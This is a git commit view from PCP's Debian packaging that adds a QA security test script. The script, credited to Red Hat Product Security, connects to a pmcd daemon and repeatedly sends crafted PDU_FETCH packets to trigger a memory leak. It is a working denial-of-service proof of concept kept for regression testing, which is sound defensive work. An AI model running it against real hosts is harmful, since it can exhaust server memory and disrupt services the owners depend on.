diff options
| author | Igor Pashev <pashev.igor@gmail.com> | 2014-10-26 12:33:50 +0400 |
|---|---|---|
| committer | Igor Pashev <pashev.igor@gmail.com> | 2014-10-26 12:33:50 +0400 |
| commit | 47e6e7c84f008a53061e661f31ae96629bc694ef (patch) | |
| tree | 648a07f3b5b9d67ce19b0fd72e8caa1175c98f1a /qa/secure/leak-fetch | |
| download | pcp-debian/3.9.10.tar.gz | |
Debian 3.9.10debian/3.9.10debian
Diffstat (limited to 'qa/secure/leak-fetch')
| -rwxr-xr-x | qa/secure/leak-fetch | 19 |
1 files changed, 19 insertions, 0 deletions
diff --git a/qa/secure/leak-fetch b/qa/secure/leak-fetch new file mode 100755 index 0000000..c25e1cc --- /dev/null +++ b/qa/secure/leak-fetch @@ -0,0 +1,19 @@ +# +# usage: python leak-fetch HOST +# +# Connects to pmcd on HOST and sends a crafted PDU_FETCH packet which triggers a memory leak. +# +# Florian Weimer / Red Hat Product Security Team +# +import socket +import sys +import pcppdu +_, host, count = sys.argv +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect((host, 44321)) +pcppdu.client_handshake(sock, from_=1) +iterations = int(count) +for i in range(iterations): + pcppdu.send_fetch(sock, from_=1, ctxnum=1, pmidlist=(1,) * 10000) + pcppdu.read_pdu(sock) +sock.close() |